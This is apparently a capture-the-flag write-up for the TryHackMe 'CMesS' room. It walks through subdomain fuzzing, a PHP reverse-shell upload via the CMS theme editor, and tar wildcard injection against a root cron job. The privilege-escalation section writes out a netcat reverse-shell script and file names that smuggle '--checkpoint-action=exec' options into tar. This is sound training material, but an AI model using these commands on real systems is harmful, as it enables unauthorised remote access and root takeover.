TryHackMe: CMesS
Today we will take a look at TryHackMe: CMesS. Please try to understand each step and take notes.
Enumeration/Scanning
> Nmap
Command: sudo nmap -sS -sC -sV -oN nmap/initial IP
> Gobuster
Command: gobuster dir -u http://cmess.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Let’s look at the admin panel
I had no idea. Until I think of looking at the subdomain.
>FFUF
Command: ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm/ -H “Host: FUZZ.cmess.thm” -fw 522
Note: I used the “-fw” command to filter the same ones.
When we look at the page, we find important information that we need to access the admin panel.
Boom. We are already on the panel. Let’s get the reverse shell.
Exploitation
Administration> Themes> Gila Blog (folder icon)> And a few steps back.
I put index.php myself to make it easier.
Perfecto
Let’s look at the home directory first.
Excellent. We need permission. It’s time to launch linpeas.sh. Let’s go to the / tmp folder
For some reason, when I saw the file with the extension .tar.gz, I checked the crontab.
Excellent. But we have a problem. We don’t know Andre’s password.
Let’s start Linpeas.
Command: chmod +x linpeas.sh
Command: ./linpeas.sh
Look at the results.
Let’s check.
We found the password. Let’s go to the backup file
Privilege escalation
I researched from various sources. But I used this source.
Let’s get the reverse shell.
Create the payload first.
Command: msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=4444 R
Let’s go to the backup file, create the script and listen.
Command: echo “mkfifo /tmp/prrcdw; nc IP Port 0</tmp/prrcdw | /bin/sh >/tmp/prrcdw 2>&1; rm /tmp/prrcdw” > shell.sh
Command: echo “” > “ — checkpoint-action=exec=sh shell.sh”
Command: echo “” > — checkpoint=1
Command: nc -nvlp 4444
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”